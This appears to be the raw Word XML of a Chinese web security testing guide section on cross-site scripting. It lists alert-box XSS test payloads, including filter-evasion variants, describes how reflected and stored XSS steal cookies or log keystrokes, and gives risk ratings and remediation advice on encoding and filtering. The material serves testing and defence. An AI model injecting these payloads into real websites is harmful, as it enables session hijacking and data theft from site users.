      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>告警框，需要根据返回网页源文件的内容，构造</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值，比如</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EB160C" w:rsidRPr="00B8545D" w14:paraId="7214FF21" w14:textId="77777777" w:rsidTr="006B4954">
        <w:trPr>
          <w:trHeight w:val="299"/>
        </w:trPr>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62F9BF"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多行文本输入框：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3213EA8E"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extarea&gt;&lt;script&gt;alert(123456)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="411A1F14"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文本输入框：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="222725C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 xml:space="preserve">&lt;/td&gt;&lt;script&gt;alert(123456)&lt;/script&gt;  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52E0D8CC"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16E9E8F9"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lastRenderedPageBreak/>
              <w:t>"&gt;&lt;script&gt;alert(123456)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="269B4A49"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itle&gt;&lt;script&gt;alert(123456)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E7DA458"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251684EF"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img]javascript:alert(123456)[/img]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BF68ACE"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scrip&lt;script&gt;t&gt;alert(123456)&lt;/scrip&lt;/script&gt;t&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C37F3B3"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div&gt;&lt;Script&gt;alert(123456)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="398D056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需要对页面上所有可以提交参数的地方进行测试。具体跨站脚本的测试语句根据实际情况的不同而不同，可自行构造，以及触发事件等切换，这里只列出了一些最常见构造语句。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32FFD882" w14:textId="77777777" w:rsidR="00A944EF" w:rsidRPr="00B8545D" w:rsidRDefault="00A944EF" w:rsidP="00B8545D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C21BF95" w14:textId="0FEA33C0" w:rsidR="00A944EF" w:rsidRPr="00B8545D" w:rsidRDefault="00C24790" w:rsidP="00B8545D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00A944EF" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE97F10" w14:textId="77777777" w:rsidR="00D06B23" w:rsidRPr="00B8545D" w:rsidRDefault="00D06B23" w:rsidP="00B8545D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见的反射型跨站脚本攻击步骤如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABC6B32" w14:textId="77777777" w:rsidR="00D06B23" w:rsidRPr="00B8545D" w:rsidRDefault="00D06B23" w:rsidP="00B8545D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者创建并测试恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496923AC" w14:textId="77777777" w:rsidR="00D06B23" w:rsidRPr="00B8545D" w:rsidRDefault="00D06B23" w:rsidP="00B8545D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者确信受害者在浏览器中加载了恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618A5466" w14:textId="77777777" w:rsidR="00D06B23" w:rsidRPr="00B8545D" w:rsidRDefault="00D06B23" w:rsidP="00B8545D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者采用反射型跨站脚本攻击方式安装键盘记录器、窃取受害者的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、窃取剪贴板内容、改变网页内容（例如下载链接）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BF6E20" w14:textId="5B7447F9" w:rsidR="00A944EF" w:rsidRPr="00B8545D" w:rsidRDefault="00D06B23" w:rsidP="00B8545D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储型跨站脚本攻击最为常见的场景是将跨站脚本写入文本输入域中，如留言板、博客或新闻发布系统的评论框。当用户浏览留言和评论时，浏览器执行跨站脚本代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF0A7E7" w14:textId="77777777" w:rsidR="00A944EF" w:rsidRPr="00B8545D" w:rsidRDefault="00A944EF" w:rsidP="00B8545D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A66206F" w14:textId="4386E29E" w:rsidR="00A944EF" w:rsidRPr="00B8545D" w:rsidRDefault="002C6BE3" w:rsidP="00B8545D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：应用中存在存储型跨站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AE0F49" w14:textId="1BDE8710" w:rsidR="002C6BE3" w:rsidRPr="00B8545D" w:rsidRDefault="002C6BE3" w:rsidP="00B8545D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：应用中存在反射型跨站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6073B905" w14:textId="25A941BF" w:rsidR="00945D39" w:rsidRPr="00B8545D" w:rsidRDefault="00A944EF" w:rsidP="00B8545D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00945D39" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r w:rsidR="00945D39" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="00945D39" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨站漏洞，可以采用以下修复方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528DE9EE"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t>总体修复方式：验证所有输入数据，有效检测攻击；对所有输出数据进行适当的编码，以防止任何已成功注入的脚本在浏览器端运行。具体如下</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295425A1"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lastRenderedPageBreak/>
        <w:t>输入验证：某个数据被接受为可被显示或存储之前，使用标准输入验证机制，验证所有输入数据的长度、类型、语法以及业务规则。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3466FC"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输出编码：数据输出前，确保用户提交的数据已被正确进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>entity</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码，建议对所有字符进行编码而不仅局限于某个子集。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215F8EB1"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明确指定输出的编码方式：不要允许攻击者为你的用户选择编码方式</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ISO 8859-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> UTF 8)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F1D82B"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注意黑名单验证方式的局限性：仅仅查找或替换一些字符</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"&lt;" "&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或类似</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"script"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的关键字</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，很容易被</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变种攻击绕过验证机制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFEC87A"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警惕规范化错误：验证输入之前，必须进行解码及规范化以符合应用程序当前的内部表示方法。请确定应用程序对同一输入不做两次解码。对客户端提交的数据进行过滤，一般建议过滤掉双引号（”）、尖括号（</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）等特殊字符，或者对客户端提交的数据中包含的特殊字符进行实体转换，比如将双引号（”）转换成其实体形式</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&amp;quot;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应的实体形式是</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&amp;lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应的实体形式是</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&amp;gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下为需过滤的常见字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45D39" w:rsidRPr="00B8545D" w14:paraId="6D09DEEF" w14:textId="77777777" w:rsidTr="006B4954">
        <w:trPr>
          <w:trHeight w:val="299"/>
        </w:trPr>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5DEEE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 |</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（竖线符号）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58A1D94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2] &amp; </w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">&amp; </w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>符号）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54191A5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3];</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（分号）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="621523A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4] $</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（美元符号）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6005642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5] %</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（百分比符号）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49E1207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6] @</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">at </w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>符号）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CA824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7] '</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（单引号）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="399A263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8] "</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（引号）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69BA06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lastRenderedPageBreak/>
              <w:t>[9] \'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（反斜杠转义单引号）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2087A97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0] \"</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（反斜杠转义引号）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F7C4A2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1] &lt;&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（尖括号）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E3504B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2] ()</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（括号）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4303D9A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3] +</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（加号）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05C25D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4] CR</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
